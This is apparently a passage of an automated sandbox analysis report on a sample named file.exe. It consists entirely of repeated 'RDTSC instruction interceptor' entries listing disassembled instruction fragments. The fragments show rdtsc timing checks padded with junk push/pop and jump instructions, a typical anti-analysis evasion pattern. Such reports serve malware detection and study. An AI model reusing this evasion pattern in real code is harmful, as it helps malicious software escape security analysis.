0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84213 second address: E84217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84313 second address: E84332 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8854FAEB95h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84332 second address: E84337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F0E second address: E84F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8854FAEB8Dh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8854FAEB88h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D1DBCh] 0x00000030 lea eax, dword ptr [ebp+12483881h] 0x00000036 cmc 0x00000037 nop 0x00000038 ja 00007F8854FAEB98h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F68 second address: E84F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F6C second address: E84F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F70 second address: E84F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F8854FD8863h 0x0000000d ja 00007F8854FD885Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F93 second address: E84FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 xor cl, FFFFFFFFh 0x00000009 lea eax, dword ptr [ebp+1248383Dh] 0x0000000f jmp 00007F8854FAEB8Dh 0x00000014 mov edx, dword ptr [ebp+122D2B59h] 0x0000001a push eax 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84FBB second address: E84FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49F5A second address: E49F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7169 second address: EB7183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007F8854FD8856h 0x0000000d jg 00007F8854FD8856h 0x00000013 jns 00007F8854FD8856h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7461 second address: EB7465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7465 second address: EB746F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FD8856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB746F second address: EB7485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F8854FAEB8Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7485 second address: EB74A9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8854FD886Ah 0x00000008 jmp 00007F8854FD885Eh 0x0000000d jc 00007F8854FD8856h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F8854FD8856h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB762C second address: EB763F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB07 second address: EBCB13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8854FD8856h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB13 second address: EBCB19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB19 second address: EBCB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB1F second address: EBCB37 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8854FAEB86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 js 00007F8854FAEB86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCCBE second address: EBCCE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD8864h 0x00000008 jmp 00007F8854FD8860h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC72C second address: EBC732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC732 second address: EBC74D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8867h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD68D second address: EBD6A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FAEB88h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8854FAEB8Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD6A6 second address: EBD6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5E43 second address: EC5E53 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FAEB92h 0x00000008 jp 00007F8854FAEB86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5E53 second address: EC5E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5FD4 second address: EC5FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC62B6 second address: EC62C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push esi 0x0000000a jp 00007F8854FD885Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC691C second address: EC6926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6A83 second address: EC6AA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8854FD8863h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6AA2 second address: EC6AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6AA6 second address: EC6ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F8854FD8856h 0x0000000e jbe 00007F8854FD8856h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6ABA second address: EC6ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6ABE second address: EC6AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5AA1 second address: EC5AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E268 second address: E3E26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCF83 second address: ECCF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F8854FAEB86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCF90 second address: ECCFCA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F8854FD887Bh 0x00000010 popad 0x00000011 push ebx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECC84C second address: ECC85D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECC9D1 second address: ECC9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECC9D6 second address: ECCA07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8854FAEB86h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f jno 00007F8854FAEB86h 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8854FAEB95h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCA07 second address: ECCA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCA0B second address: ECCA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCCF1 second address: ECCCFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8854FD8856h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCCFB second address: ECCD07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCD07 second address: ECCD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCD0B second address: ECCD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECF3AB second address: ECF3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8854FD8856h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECF0D1 second address: ECF0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2EDD second address: ED2F03 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FD886Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2F03 second address: ED2F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2F07 second address: ED2F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2803 second address: ED2818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2818 second address: ED281C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED281C second address: ED283E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB90h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F8854FAEB8Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED283E second address: ED284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD885Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED284F second address: ED28B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnc 00007F8854FAEB86h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jng 00007F8854FAEB86h 0x0000001f jmp 00007F8854FAEB8Fh 0x00000024 jmp 00007F8854FAEB94h 0x00000029 popad 0x0000002a jmp 00007F8854FAEB8Eh 0x0000002f push eax 0x00000030 push edx 0x00000031 js 00007F8854FAEB86h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED28B2 second address: ED28B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BC8 second address: ED2BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BCE second address: ED2BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BD2 second address: ED2BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BDE second address: ED2C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F8854FD8858h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F8854FD8856h 0x00000019 jno 00007F8854FD8856h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5D9 second address: E4D5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5DD second address: E4D5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5E1 second address: E4D5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5E7 second address: E4D60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8854FD885Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jmp 00007F8854FD885Ah 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D60E second address: E4D612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D612 second address: E4D618 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D618 second address: E4D620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D620 second address: E4D624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D624 second address: E4D628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED7D62 second address: ED7D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 je 00007F8854FD8858h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F8854FD8856h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81B2 second address: ED81BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81BA second address: ED81C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81C3 second address: ED81E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8854FAEB91h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81E2 second address: ED81E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81E6 second address: ED8219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB93h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F8854FAEB8Fh 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED84FB second address: ED851F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8854FD8856h 0x00000008 jmp 00007F8854FD8866h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED86FA second address: ED8705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8705 second address: ED870F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8854FD8856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC4FC second address: EDC514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8854FAEB8Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC514 second address: EDC51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC944 second address: EDC948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDE61A second address: EDE629 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F8854FD8856h 0x00000009 pop edx 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5B4C second address: EE5B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5B53 second address: EE5B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a jmp 00007F8854FD885Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5E43 second address: EE5E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5E57 second address: EE5E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8854FD8856h 0x0000000a jmp 00007F8854FD8866h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6430 second address: EE6434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6434 second address: EE6455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8854FD8868h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8404A second address: E84052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE69C9 second address: EE69D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE69D0 second address: EE69DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6C33 second address: EE6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6C42 second address: EE6C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE71F5 second address: EE7212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7212 second address: EE7217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
